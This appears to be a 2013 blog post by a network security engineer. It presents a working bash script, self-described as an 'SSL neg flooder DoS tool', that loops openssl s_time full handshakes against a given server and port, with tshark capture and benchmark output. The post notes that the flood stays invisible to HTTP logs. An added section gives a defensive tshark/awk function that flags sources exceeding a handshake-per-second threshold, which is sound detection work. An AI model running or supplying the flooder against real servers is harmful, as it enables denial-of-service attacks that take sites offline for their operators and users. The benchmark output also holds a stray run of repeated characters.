Thursday, May 23, 2013

SSL flooder using openssl


We will look at another simple SSL negotiation flooder script, this one built on openssl s_time.

In this approach the client repeatedly performs a full SSL handshake and then drops the connection without ever sending application data. Every new handshake forces the server to deliver its certificate chain and do the session setup work, so a steady stream of them raises the server's CPU load and bandwidth while nothing reaches the HTTP layer. Because no request is ever made, the traffic has to be spotted at the TLS layer (handshake counters, a packet capture, the TLS terminator's own logs) rather than in the web server's access logs.


Here's the script:

#!/bin/bash
#
# rev 1.0
#
#  ssl negotiation generation & flooding via openssl and s_time
#
#    SSL neg flooder DoS tool
#    This tool loops the SSL negotiation and requests no HTTP traffic from the host,
#    so any HTTP application logs will not see any requests or L7 attacks.
#
#    Each iteration runs openssl s_time for 200 seconds ( -time 200 ), forcing a
#    brand new session on every connection ( -new, no session reuse ) with
#    non-blocking I/O ( -nbio ). The first argument is therefore the number of
#    200-second s_time runs, not the number of handshakes.
#
if [ $# -ne 3 ]; then
            echo " Usage : $0  <number of s_time runs to execute>  <server or ip_address> <port> "
            echo ""
            echo "Example  $0  10 1.1.1.1 443 "
            echo ""
            exit 1
fi

if ! [[ $1 =~ ^[0-9]+$ ]]; then
            echo "The number of runs must be a positive integer"
            exit 1
fi

i=0
###set -xv
COUNTER=$1
MAX=9999999

if (( COUNTER >= MAX )) ; then
        echo "   "
        echo "Please make a request range of $MAX  or less"
        echo "   "
        exit 1
fi

while [ "$i" -lt "$COUNTER" ] ; do
  # one 200-second burst of fresh handshakes, no HTTP request ( no -www )
  openssl s_time -connect "$2:$3" -time 200 -nbio -new
  echo "   "
  echo " Request # $i "
  echo "   "
  i=$((i + 1))
done

And here's what tshark decodes (output shortened). Note that every Server Hello carries a Certificate and Server Key Exchange, i.e. each connection is a full handshake and none are resumed, which is exactly what -new forces:

2013-05-23 16:05:20.912039    127.0.0.1 -> 127.0.0.1    TLSv1 1055 Server Hello, Certificate, Server Key Exchange, Server Hello Done
2013-05-23 16:05:20.913222    127.0.0.1 -> 127.0.0.1    TLSv1 190 Client Key Exchange, Change Cipher Spec, Encrypted Handshake Message
2013-05-23 16:05:20.913813    127.0.0.1 -> 127.0.0.1    TLSv1 115 Change Cipher Spec, Encrypted Handshake Message
2013-05-23 16:05:20.915249    127.0.0.1 -> 127.0.0.1    TLSv1 1055 Server Hello, Certificate, Server Key Exchange, Server Hello Done
1806 packets captured
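
Since nothing reaches the HTTP layer, the place to look for this traffic is the handshake itself. As an added example, not part of the original post, the bash function below scans tshark one-line-per-packet output like the capture above and flags any source that opens at least a threshold number of fresh handshakes (Client Hello) within one second. The field layout follows the tshark lines quoted above; the function names, the threshold and the sample capture lines are constructed here for illustration.

```bash
#!/bin/bash
# Added example: flag sources opening too many TLS handshakes per second,
# using tshark-style one-line output ( DATE TIME SRC -> DST PROTO LEN INFO ).
# Field layout follows the capture quoted above; names and sample data are
# assumptions made for this illustration, not from the original post.

# Usage: tls_flood_sources THRESHOLD < tshark_lines
# Prints "SRC_IP HH:MM:SS COUNT" for every (source, second) bucket whose
# Client Hello count is >= THRESHOLD. A full handshake always starts with a
# Client Hello, so counting those counts new negotiations, not HTTP requests.
tls_flood_sources() {
    local threshold="${1:-50}"
    awk -v thr="$threshold" '
        /Client Hello/ {
            sec = substr($2, 1, 8)      # HH:MM:SS, drop the fractional part
            key = $3 " " sec            # $3 is the source address
            n[key]++
        }
        END {
            for (k in n) if (n[k] >= thr) print k, n[k]
        }' | sort
}

# Constructed sample capture (not a real trace): 10.0.0.5 opens 8 handshakes
# inside one second, 10.0.0.9 opens one handshake in each of two seconds.
sample_capture() {
    local i
    for i in 1 2 3 4 5 6 7 8; do
        printf '2013-05-23 16:05:20.%06d    10.0.0.5 -> 10.0.0.1    TLSv1 187 Client Hello\n' "$((i * 1000))"
        printf '2013-05-23 16:05:20.%06d    10.0.0.1 -> 10.0.0.5    TLSv1 1055 Server Hello, Certificate, Server Key Exchange, Server Hello Done\n' "$((i * 1000 + 500))"
    done
    printf '2013-05-23 16:05:20.090000    10.0.0.9 -> 10.0.0.1    TLSv1 187 Client Hello\n'
    printf '2013-05-23 16:05:21.010000    10.0.0.9 -> 10.0.0.1    TLSv1 187 Client Hello\n'
}

# Flag anything at 5 or more fresh handshakes per second from one source.
sample_capture | tls_flood_sources 5
```

Against a live interface the same function can be fed directly, e.g. `tshark -i eth0 -f 'tcp port 443' -l | tls_flood_sources 50`, although in that form the report only appears when tshark exits; for continuous alerting the per-second buckets would be emitted as they close rather than in the END block. A threshold has to be set from a baseline of the server's normal handshake rate, since legitimate clients without session reuse also produce one Client Hello per connection.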

And at the conclusion of each s_time run, we get some benchmark numbers (output shortened):
 
ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt

55699 connections in 68.99s; 807.35 connections/user sec, bytes read 0
55699 connections in 201 real seconds, 0 bytes read per connection

 Request # 0

Read the two lines carefully: the 807 connections/user sec figure is per CPU-second of the openssl client process, which only spent about 69 s of CPU in the 201 s wall-clock run. The rate the server actually saw is 55699 / 201, roughly 277 fresh handshakes per second from a single client, and the 0 bytes read confirms that no HTTP request was ever sent ( no -www page was given to s_time ).


Ken Felix
Freelance Network/Security Engineer
